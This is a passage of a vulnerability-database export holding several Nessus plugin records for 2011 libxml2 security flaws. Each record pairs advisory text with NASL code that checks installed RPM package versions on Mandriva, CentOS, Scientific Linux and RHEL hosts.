script_cvs_date(\"Date: 2018/07/19 20:59:17\");\n\n script_cve_id(\"CVE-2011-0216\", \"CVE-2011-3905\");\n script_bugtraq_id(48832);\n script_xref(name:\"MDVSA\", value:\"2011:188\");\n\n script_name(english:\"Mandriva Linux Security Advisory : libxml2 (MDVSA-2011:188)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerabilities has been discovered and corrected in \nlibxml2 :\n\nOff-by-one error in libxml allows remote attackers to execute\narbitrary code or cause a denial of service (heap-based buffer\noverflow and application crash) via a crafted website CVE-2011-0216).\n\nlibxml2 allows remote attackers to cause a denial of service\n(out-of-bounds read) via unspecified vectors (CVE-2011-3905).\n\nThe updated packages have been patched to correct these issues.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64xml2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64xml2_2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libxml2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libxml2-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libxml2-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libxml2_2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2010.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2011\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/12/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/12/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"x86_64\", reference:\"lib64xml2-devel-2.7.7-1.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"x86_64\", reference:\"lib64xml2_2-2.7.7-1.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"i386\", reference:\"libxml2-devel-2.7.7-1.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"libxml2-python-2.7.7-1.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"libxml2-utils-2.7.7-1.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"i386\", reference:\"libxml2_2-2.7.7-1.5mdv2010.2\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2011\", cpu:\"x86_64\", reference:\"lib64xml2-devel-2.7.8-6.3-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"x86_64\", reference:\"lib64xml2_2-2.7.8-6.3-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"i386\", reference:\"libxml2-devel-2.7.8-6.3-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"libxml2-python-2.7.8-6.3-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"libxml2-utils-2.7.8-6.3-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"i386\", reference:\"libxml2_2-2.7.8-6.3-mdv2011.0\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:15:50", "bulletinFamily": "scanner", "description": "Updated libxml2 packages that fix several security issues are now available for Red Hat Enterprise Linux 4.\n\nThe Red Hat Security Response Team has rated this update as having important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe libxml2 library is a development toolbox providing the implementation of various XML standards. One of those standards is the XML Path Language (XPath), which is a language for addressing parts of an XML document.\n\nA heap-based buffer overflow flaw was found in the way libxml2 decoded entity references with long names. A remote attacker could provide a specially crafted XML file that, when opened in an application linked against libxml2, would cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application. (CVE-2011-3919)\n\nAn off-by-one error, leading to a heap-based buffer overflow, was found in the way libxml2 parsed certain XML files. A remote attacker could provide a specially crafted XML file that, when opened in an application linked against libxml2, would cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application. (CVE-2011-0216)\n\nA flaw was found in the way libxml2 parsed certain XPath expressions.\nIf an attacker were able to supply a specially crafted XML file to an application using libxml2, as well as an XPath expression for that application to run against the crafted file, it could cause the application to crash. (CVE-2011-2834)\n\nNote: Red Hat does not ship any applications that use libxml2 in a way that would allow the CVE-2011-2834 flaw to be exploited; however, third-party applications may allow XPath expressions to be passed which could trigger this flaw.\n\nAn out-of-bounds memory read flaw was found in libxml2. A remote attacker could provide a specially crafted XML file that, when opened in an application linked against libxml2, would cause the application to crash. (CVE-2011-3905)\n\nAll users of libxml2 are advised to upgrade to these updated packages, which contain backported patches to correct these issues. The desktop must be restarted (log out, then log back in) for this update to take effect.", "modified": "2018-11-10T00:00:00", "id": "CENTOS_RHSA-2012-0016.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=57486", "published": "2012-01-12T00:00:00", "title": "CentOS 4 : libxml2 (CESA-2012:0016)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0016 and \n# CentOS Errata and Security Advisory 2012:0016 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(57486);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/11/10 11:49:29\");\n\n script_cve_id(\"CVE-2011-0216\", \"CVE-2011-2834\", \"CVE-2011-3905\", \"CVE-2011-3919\");\n script_xref(name:\"RHSA\", value:\"2012:0016\");\n\n script_name(english:\"CentOS 4 : libxml2 (CESA-2012:0016)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated libxml2 packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 4.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe libxml2 library is a development toolbox providing the\nimplementation of various XML standards. One of those standards is the\nXML Path Language (XPath), which is a language for addressing parts of\nan XML document.\n\nA heap-based buffer overflow flaw was found in the way libxml2 decoded\nentity references with long names. A remote attacker could provide a\nspecially crafted XML file that, when opened in an application linked\nagainst libxml2, would cause the application to crash or, potentially,\nexecute arbitrary code with the privileges of the user running the\napplication. (CVE-2011-3919)\n\nAn off-by-one error, leading to a heap-based buffer overflow, was\nfound in the way libxml2 parsed certain XML files. A remote attacker\ncould provide a specially crafted XML file that, when opened in an\napplication linked against libxml2, would cause the application to\ncrash or, potentially, execute arbitrary code with the privileges of\nthe user running the application. (CVE-2011-0216)\n\nA flaw was found in the way libxml2 parsed certain XPath expressions.\nIf an attacker were able to supply a specially crafted XML file to an\napplication using libxml2, as well as an XPath expression for that\napplication to run against the crafted file, it could cause the\napplication to crash. (CVE-2011-2834)\n\nNote: Red Hat does not ship any applications that use libxml2 in a way\nthat would allow the CVE-2011-2834 flaw to be exploited; however,\nthird-party applications may allow XPath expressions to be passed\nwhich could trigger this flaw.\n\nAn out-of-bounds memory read flaw was found in libxml2. A remote\nattacker could provide a specially crafted XML file that, when opened\nin an application linked against libxml2, would cause the application\nto crash. (CVE-2011-3905)\n\nAll users of libxml2 are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. The desktop\nmust be restarted (log out, then log back in) for this update to take\neffect.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2012-January/018369.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?af976a57\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libxml2 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libxml2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libxml2-python\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:4\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/01/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"libxml2-2.6.16-12.9\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"libxml2-2.6.16-12.9\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"libxml2-devel-2.6.16-12.9\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"libxml2-devel-2.6.16-12.9\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"libxml2-python-2.6.16-12.9\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"libxml2-python-2.6.16-12.9\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:17:20", "bulletinFamily": "scanner", "description": "The libxml2 library is a development toolbox providing the implementation of various XML standards. One of those standards is the XML Path Language (XPath), which is a language for addressing parts of an XML document.\n\nA heap-based buffer overflow flaw was found in the way libxml2 decoded entity references with long names. A remote attacker could provide a specially crafted XML file that, when opened in an application linked against libxml2, would cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application. (CVE-2011-3919)\n\nAn off-by-one error, leading to a heap-based buffer overflow, was found in the way libxml2 parsed certain XML files. A remote attacker could provide a specially crafted XML file that, when opened in an application linked against libxml2, would cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application. (CVE-2011-0216)\n\nA flaw was found in the way libxml2 parsed certain XPath expressions.\nIf an attacker were able to supply a specially crafted XML file to an application using libxml2, as well as an XPath expression for that application to run against the crafted file, it could cause the application to crash. (CVE-2011-2834)\n\nNote: Scientific Linux does not ship any applications that use libxml2 in a way that would allow the CVE-2011-2834 flaw to be exploited;\nhowever, third-party applications may allow XPath expressions to be passed which could trigger this flaw.\n\nAn out-of-bounds memory read flaw was found in libxml2. A remote attacker could provide a specially crafted XML file that, when opened in an application linked against libxml2, would cause the application to crash. (CVE-2011-3905)\n\nAll users of libxml2 are advised to upgrade to these updated packages, which contain backported patches to correct these issues. The desktop must be restarted (log out, then log back in) for this update to take effect.", "modified": "2018-12-31T00:00:00", "id": "SL_20120111_LIBXML2_ON_SL4_X.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=61216", "published": "2012-08-01T00:00:00", "title": "Scientific Linux Security Update : libxml2 on SL4.x i386/x86_64", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(61216);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2018/12/31 11:35:00\");\n\n script_cve_id(\"CVE-2011-0216\", \"CVE-2011-2834\", \"CVE-2011-3905\", \"CVE-2011-3919\");\n\n script_name(english:\"Scientific Linux Security Update : libxml2 on SL4.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The libxml2 library is a development toolbox providing the\nimplementation of various XML standards. One of those standards is the\nXML Path Language (XPath), which is a language for addressing parts of\nan XML document.\n\nA heap-based buffer overflow flaw was found in the way libxml2 decoded\nentity references with long names. A remote attacker could provide a\nspecially crafted XML file that, when opened in an application linked\nagainst libxml2, would cause the application to crash or, potentially,\nexecute arbitrary code with the privileges of the user running the\napplication. (CVE-2011-3919)\n\nAn off-by-one error, leading to a heap-based buffer overflow, was\nfound in the way libxml2 parsed certain XML files. A remote attacker\ncould provide a specially crafted XML file that, when opened in an\napplication linked against libxml2, would cause the application to\ncrash or, potentially, execute arbitrary code with the privileges of\nthe user running the application. (CVE-2011-0216)\n\nA flaw was found in the way libxml2 parsed certain XPath expressions.\nIf an attacker were able to supply a specially crafted XML file to an\napplication using libxml2, as well as an XPath expression for that\napplication to run against the crafted file, it could cause the\napplication to crash. (CVE-2011-2834)\n\nNote: Scientific Linux does not ship any applications that use libxml2\nin a way that would allow the CVE-2011-2834 flaw to be exploited;\nhowever, third-party applications may allow XPath expressions to be\npassed which could trigger this flaw.\n\nAn out-of-bounds memory read flaw was found in libxml2. A remote\nattacker could provide a specially crafted XML file that, when opened\nin an application linked against libxml2, would cause the application\nto crash. (CVE-2011-3905)\n\nAll users of libxml2 are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. The desktop\nmust be restarted (log out, then log back in) for this update to take\neffect.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1201&L=scientific-linux-errata&T=0&P=445\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?940b98e2\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/01/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL4\", reference:\"libxml2-2.6.16-12.9\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"libxml2-debuginfo-2.6.16-12.9\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"libxml2-devel-2.6.16-12.9\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"libxml2-python-2.6.16-12.9\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:15:51", "bulletinFamily": "scanner", "description": "Updated libxml2 packages that fix several security issues are now available for Red Hat Enterprise Linux 4.\n\nThe Red Hat Security Response Team has rated this update as having important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe libxml2 library is a development toolbox providing the implementation of various XML standards. One of those standards is the XML Path Language (XPath), which is a language for addressing parts of an XML document.\n\nA heap-based buffer overflow flaw was found in the way libxml2 decoded entity references with long names. A remote attacker could provide a specially crafted XML file that, when opened in an application linked against libxml2, would cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application. (CVE-2011-3919)\n\nAn off-by-one error, leading to a heap-based buffer overflow, was found in the way libxml2 parsed certain XML files. A remote attacker could provide a specially crafted XML file that, when opened in an application linked against libxml2, would cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application. (CVE-2011-0216)\n\nA flaw was found in the way libxml2 parsed certain XPath expressions.\nIf an attacker were able to supply a specially crafted XML file to an application using libxml2, as well as an XPath expression for that application to run against the crafted file, it could cause the application to crash. (CVE-2011-2834)\n\nNote: Red Hat does not ship any applications that use libxml2 in a way that would allow the CVE-2011-2834 flaw to be exploited; however, third-party applications may allow XPath expressions to be passed which could trigger this flaw.\n\nAn out-of-bounds memory read flaw was found in libxml2. A remote attacker could provide a specially crafted XML file that, when opened in an application linked against libxml2, would cause the application to crash. (CVE-2011-3905)\n\nAll users of libxml2 are advised to upgrade to these updated packages, which contain backported patches to correct these issues. The desktop must be restarted (log out, then log back in) for this update to take effect.", "modified": "2018-11-26T00:00:00", "id": "REDHAT-RHSA-2012-0016.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=57491", "published": "2012-01-12T00:00:00", "title": "RHEL 4 : libxml2 (RHSA-2012:0016)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0016. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(57491);\n script_version (\"1.15\");\n script_cvs_date(\"Date: 2018/11/26 11:02:15\");\n\n script_cve_id(\"CVE-2011-0216\", \"CVE-2011-2834\", \"CVE-2011-3905\", \"CVE-2011-3919\");\n script_xref(name:\"RHSA\", value:\"2012:0016\");\n\n script_name(english:\"RHEL 4 : libxml2 (RHSA-2012:0016)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated libxml2 packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 4.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe libxml2 library is a development toolbox providing the\nimplementation of various XML standards. One of those standards is the\nXML Path Language (XPath), which is a language for addressing parts of\nan XML document.\n\nA heap-based buffer overflow flaw was found in the way libxml2 decoded\nentity references with long names. A remote attacker could provide a\nspecially crafted XML file that, when opened in an application linked\nagainst libxml2, would cause the application to crash or, potentially,\nexecute arbitrary code with the privileges of the user running the\napplication. (CVE-2011-3919)\n\nAn off-by-one error, leading to a heap-based buffer overflow, was\nfound in the way libxml2 parsed certain XML files. A remote attacker\ncould provide a specially crafted XML file that, when opened in an\napplication linked against libxml2, would cause the application to\ncrash or, potentially, execute arbitrary code with the privileges of\nthe user running the application. (CVE-2011-0216)\n\nA flaw was found in the way libxml2 parsed certain XPath expressions.\nIf an attacker were able to supply a specially crafted XML file to an\napplication using libxml2, as well as an XPath expression for that\napplication to run against the crafted file, it could cause the\napplication to crash. (CVE-2011-2834)\n\nNote: Red Hat does not ship any applications that use libxml2 in a way\nthat would allow the CVE-2011-2834 flaw to be exploited; however,\nthird-party applications may allow XPath expressions to be passed\nwhich could trigger this flaw.\n\nAn out-of-bounds memory read flaw was found in libxml2. A remote\nattacker could provide a specially crafted XML file that, when opened\nin an application linked against libxml2, would cause the application\nto crash. (CVE-2011-3905)\n\nAll users of libxml2 are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. The desktop\nmust be restarted (log out, then log back in) for this update to take\neffect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-0216\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-2834\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-3905\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-3919\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2012:0016\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected libxml2, libxml2-devel and / or libxml2-python\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libxml2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libxml2-python\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/01/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/01/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2012:0016\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL4\", reference:\"libxml2-2.6.16-12.9\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"libxml2-devel-2.6.16-12.9\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"libxml2-python-2.6.16-12.9\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libxml2 / libxml2-devel / libxml2-python\");\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:19:33", "bulletinFamily": "scanner", "description": "From Red Hat Security Advisory 2012:0016 :\n\nUpdated libxml2 packages that fix several security issues are now available for Red Hat Enterprise Linux 4.\n\nThe Red Hat Security Response Team has rated this update as having important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe libxml2 library is a development toolbox providing the implementation of various XML standards. One of those standards is the XML Path Language (XPath), which is a language for addressing parts of an XML document.\n\nA heap-based buffer overflow flaw was found in the way libxml2 decoded entity references with long names. A remote attacker could provide a specially crafted XML file that, when opened in an application linked against libxml2, would cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application. (CVE-2011-3919)\n\nAn off-by-one error, leading to a heap-based buffer overflow, was found in the way libxml2 parsed certain XML files. A remote attacker could provide a specially crafted XML file that, when opened in an application linked against libxml2, would cause the 